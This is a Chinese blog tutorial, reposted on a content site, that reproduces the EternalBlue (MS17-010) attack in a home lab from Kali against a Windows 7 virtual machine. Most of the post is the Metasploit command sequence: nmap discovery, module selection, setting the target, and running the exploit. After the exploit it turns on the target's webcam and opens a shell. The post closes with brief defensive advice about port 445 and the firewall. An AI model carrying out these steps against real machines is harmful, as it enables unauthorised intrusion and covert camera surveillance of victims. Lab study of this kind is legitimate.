当前位置:   article > 正文

“永恒之蓝”漏洞的复现_kaliping不通靶机

kaliping不通靶机


  • 环境准备

kali虚拟机,windows7靶机

  • 实验操作

因为在同一局域网,利用kali 输入指令ifconfig扫描出本机地址为193.168.56.131  ;再输入指令nmap -sn 192.168.56.1/24 扫出windows7靶机ip地址为192.168.56.142

先尝试用kali ping 一下,windows7靶机的ip地址看看能不能ping通(注意的是,windows7防火墙要关闭才能ping通),结果是能ping通的

 

 

打开kali的msfconsole端口

 

输入指令  search ms17_010

 

根据上图端口目录,我的机子用的是端口3,所以输入 use 3

show options

 

这时就要用到靶机的ip地址了,输入 set rhosts ip地址

show options  

 

 

在输入  run

run结束后在打开一个终端

输入search ms17_010

按照刚刚所看端口,我要使用的攻击是端口2

所以输入 use 2

show options

 

再次输入set rhosts 靶机ip地址

run

run成功的话,会出现一个win

 

 

接下来就可以进行攻击操作了

输入指令webcam_stream,打开了靶机的摄像头(假如靶机没看摄像头,要打开)

(这样就是打开摄像头了)

输入指令shell拿到高级控制权

当然,还有很多指令操作我就不一一列举了

最后,在被入侵前后,windows7也是能自查的

在windows7控制面版输入 netstat即可查看被入侵前后端口连接的状态

入侵前

入侵后

可以发现,入侵后windows7的445端口被连接了,所以我们也得出了防范该漏洞的一些简单操作:

  1. 打开防火墙进行防范病毒
  2. 针对这个病毒,平时把445端口关闭即可
  3. 健康上网,不浏览不明网站等
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/知新_RL/article/detail/251815?site
推荐阅读
相关标签
  

闽ICP备14008679号